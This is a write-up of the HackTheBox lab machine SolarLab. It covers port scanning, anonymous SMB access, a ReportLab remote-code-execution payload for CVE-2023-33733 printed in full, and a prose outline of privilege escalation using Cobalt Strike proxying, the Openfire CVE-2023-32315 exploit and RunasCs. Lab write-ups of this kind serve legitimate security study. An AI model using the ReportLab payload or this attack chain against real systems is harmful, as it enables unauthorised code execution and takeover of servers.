SolarLab HTB Writeup | HacktheBox

By /

In this walkthrough, I demonstrate how I obtained complete ownership of SolarLab on HackTheBox.

Lets Solve SolarLab HTB Writeup

SolarLab is a notable challenge within the HacktheBox community, demanding a comprehensive understanding of cybersecurity and penetration testing. By immersing ourselves in this hands-on experience, we gain invaluable insights into the real-world scenarios faced by ethical hackers in securing digital environments.

HTB SolarLab link: https://app.hackthebox.com/machines/SolarLab

Intelligence

Scan ports:

PORT     STATE SERVICE       VERSION
80/tcp   open  http          nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to <http://solarlab.htb/>
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
6791/tcp open  http          nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to <http://report.solarlab.htb:6791/>
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -21s
| smb2-time:
|   date: 2024-05-13T16:13:30
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Add domains to / etc / hosts

echo "10.10.11.16 solarlab.htb" | sudo tee -a /etc/hosts


echo "10.10.11.16 report.solarlab.htb" | sudo tee -a /etc/hosts

We get to the satika:

User flag

We connect by smb to anonymous

Download the table with passwords

We log under the Blakeb user. We get here:

We stumble upon a PDF generator. We look at the metadata of the file. We see that the document is generated using the Report Lab PDF Library

Having found popular vulnerabilities on the Internet, we stumble upon CVE-2023-33733. This is a vulnerability in the ReportLab library associated with unsafe processing of input data, which allows an attacker to execute arbitrary code.

Read more here: https://github.com/c53elyas/CVE-2023-33733

PoC:

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('Здесь мог бы быть ваш payload') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
                exploit
</font></para>

Intercept the request in burpsuite, implement the payload

We get shell, read user-flag

Root flag

View open ports

We launch Cobaltstrike, where we generate SOCKS4 at port 57378. Alternatively to Cobalt, porting can be used https://github.com/Pokefenn/Chisel

Using proxychains check connection

Through FoxyProxy we get access to the local Web at 9090 port

We are met by the form of the Openfire login

We start MSF console by throwing all traffic through the captured car

We will use the exploit for CVE-2023-32315. He will create a new account for us and return the shell

Go to the database file directory

Find the Openfire database

We pull out the administrator hash

Broome with it OpenFireDecryptPass

Download to target car RunasCs.exe. It allows you to create a process on behalf of the administrator (if the password is known) with full privileges

Having previously downloaded openfire Shell.exe to the user’s desktop, run exe and catch it in cobalt

https://newsploit.online/wp-content/uploads/2024/05/image_2024-05-14_16-09-18-1--300x151.jpg

We read root-flag

FAQ

What is the SolarLab challenge on HacktheBox?

The SolarLab challenge on HacktheBox is a simulated cybersecurity challenge that tests participants’ hacking skills and knowledge. It presents a realistic scenario in which players must navigate through a virtual environment, identifying vulnerabilities, exploiting them, and escalating privileges to complete the challenge objectives.

What skills are required to tackle the SolarLab challenge?

Tackling the SolarLab challenge requires proficiency in various areas, including network reconnaissance, vulnerability scanning, exploit development, privilege escalation, and post-exploitation techniques. Participants must have a solid understanding of penetration testing methodologies, common hacking tools, and techniques to successfully navigate the challenge.

What is the initial reconnaissance phase in the SolarLab challenge?

The initial reconnaissance phase in the SolarLab challenge involves gathering information about the target network and infrastructure. Hackers leverage various methods and tools like port scanning, banner grabbing, and enumeration to identify potential entry points and understand the layout and technologies used in the SolarLab environment.

How is scanning and enumeration performed in the SolarLab challenge?

Scanning and enumeration in the SolarLab challenge involve using tools such as Nmap and enumeration scripts to identify open ports, services, and potential vulnerabilities. This phase helps hackers gather valuable information about the target system, including running services, software versions, and misconfigurations that may lead to exploitable vulnerabilities.

What is the process of exploiting vulnerabilities in the SolarLab challenge?

Exploiting vulnerabilities in the SolarLab challenge involves identifying and leveraging weaknesses within the target system or applications. Hackers may utilize exploit frameworks, custom scripts, or manual exploitation techniques to exploit vulnerabilities, gain unauthorized access, and achieve the desired objectives of the challenge.

How do you escalate privileges in the SolarLab challenge?

Privilege escalation in the SolarLab challenge involves elevating user privileges to gain access to restricted files, directories, or systems. Hackers make use of various techniques like exploiting misconfigurations, leveraging kernel vulnerabilities, and abusing weak access controls to escalate privileges within the target environment.

What is the post-exploitation phase in the SolarLab challenge?

The post-exploitation phase in the SolarLab challenge focuses on maintaining access, exfiltrating data, and exploring the compromised system. Hackers may set up backdoors, establish persistence mechanisms, perform lateral movement to other systems, or extract sensitive information to achieve the intended goals of the challenge.

How important is analysis and reporting in the SolarLab challenge?

Analysis and reporting play a crucial role in the SolarLab challenge as they enable hackers to document their findings, actions, and techniques used throughout the challenge. Proper analysis helps identify areas of improvement, while comprehensive reporting showcases the skills and knowledge gained during the hands-on experience, enhancing the ethical hacking and penetration testing capabilities of participants.

What can be learned from completing the SolarLab challenge?

Completing the SolarLab challenge provides valuable hands-on experience in various aspects of ethical hacking and penetration testing. Participants gain insights into real-world hacking scenarios, improve their technical skills, enhance their problem-solving abilities, and develop a deep understanding of secure system configurations and vulnerabilities that can be used to improve cybersecurity practices.

Leave a Comment

Your email address will not be published. Required fields are marked *

©2024 Copyright HackerHQ All Right Reseved

Scroll to Top